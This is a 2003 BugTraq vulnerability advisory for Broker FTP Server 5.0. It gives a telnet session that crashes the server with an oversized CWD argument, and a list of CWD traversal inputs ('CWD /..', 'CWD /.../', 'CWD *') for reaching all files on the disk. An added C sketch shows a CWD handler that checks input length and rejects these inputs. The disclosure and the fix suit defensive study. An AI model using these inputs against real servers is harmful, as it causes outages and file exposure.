BugTraq
Buffer Overflow in Broker FTP Server Mar 30 2003 07:32PM
subj (r2subj3ct dwclan org) (1 replies)


Product : Broker FTP Server

Version : 5.0

OSystem : Windows

Authors : TransSoft

WebSite : http://www.ftp-broker.com

Problem :

* Buffer Overflow in field CWD

* Access to all files on a disk

#[Denial of Service]#

Description:

------------

eng:

====

To trigger the overflow in the CWD field, it is necessary to send more than 256

bytes of junk to it.

After that the server will crash and will show no further signs of life.

Exploit:

--------

*************************************

>>Telnet 127.0.0.1:21

220 FTP Server Ready [***]

>>USER anonymous

331 Password required for anonymous.

>>PASS anonymous@localhost

230-Welcome to Broker FTP Server.

230-

230 User anonymous logged in.

CWD AAAAAAAAAAA......AAAAA [256b]

*************************************

#[Access to all files on a disk]#

Description:

------------

eng:

====

Due to this vulnerability you can get access to all files on the hard drive

of the server.

Exploits:

Current Directory : "/"

CWD *

CWD /*

CWD /..

CWD /...

CWD /.../

Contacts:

---------

r2subj3ct (at) dwclan (dot) org

subj.24h.to (www.dwcgr0up.com/subj/)

www.dwcgr0up.com

irc.dwcgr0up.biz #dwc

Thanks:

-------

DHG, GipsHack, Netp0is0n, de1irium, r00tc0de, f0kp, exploit.ru, nobodies

DethSpirit, r4ShRaY, D4rkGr3y, Moby, Orb, Foster, Owned, prior, Demon.

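A defensive counterpart to the two issues reported above, as an added example that is not part of the original post and not TransSoft's code: a CWD argument handler that checks length before any copy and refuses the wildcard and dot-only arguments listed in the advisory. The function name `resolve_cwd`, the 255-byte limit and the choice to refuse rather than clamp at the root are assumptions of this sketch.

```c
#include <stdio.h>
#include <string.h>

#define CWD_MAX 255   /* assumed per-argument limit for this sketch */

/* Resolve a NUL-terminated CWD argument against the session's current
 * virtual directory. On success writes the normalized virtual path to out
 * and returns 0; returns -1 if the argument must be refused. */
int resolve_cwd(const char *cwd, const char *arg, char *out, size_t outsz)
{
    char buf[2 * CWD_MAX + 2];          /* cwd + '/' + arg + NUL */
    size_t len = 0;

    /* Lengths are checked before any copy, so nothing can overrun buf. */
    if (outsz < 2 || strlen(cwd) > CWD_MAX) return -1;
    if (arg[0] == '\0' || strlen(arg) > CWD_MAX) return -1;
    /* Wildcards, backslashes and colons are never valid in a directory. */
    if (strpbrk(arg, "*?\\:") != NULL) return -1;

    if (arg[0] == '/') snprintf(buf, sizeof buf, "%s", arg);
    else               snprintf(buf, sizeof buf, "%s/%s", cwd, arg);

    out[0] = '\0';                      /* "" stands for the virtual root */
    for (const char *p = buf; *p != '\0'; ) {
        size_t n = strcspn(p, "/");
        const char *comp = p;
        if (n == 0) { p++; continue; }  /* skip empty components */
        p += n;
        if (strspn(comp, ".") == n) {   /* component made only of dots */
            if (n == 1) continue;       /* "." stays in place */
            if (n > 2) return -1;       /* "..." and longer: refuse */
            char *s = strrchr(out, '/');/* ".." pops one component */
            if (s == NULL) return -1;   /* would climb above the root */
            *s = '\0';
            len = (size_t)(s - out);
            continue;
        }
        /* Win32 strips trailing dots and spaces, so refuse them here. */
        if (comp[n - 1] == '.' || comp[n - 1] == ' ') return -1;
        if (len + n + 2 > outsz) return -1;
        out[len] = '/';
        memcpy(out + len + 1, comp, n);
        len += n + 1;
        out[len] = '\0';
    }
    if (len == 0) strcpy(out, "/");
    return 0;
}
```

The returned path is still a virtual one; the server maps it onto the configured root directory only after this check has passed.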
Re: Buffer Overflow in Broker FTP Server Apr 08 2003 05:26PM
Knud Erik Højgaard (kain ircop dk)

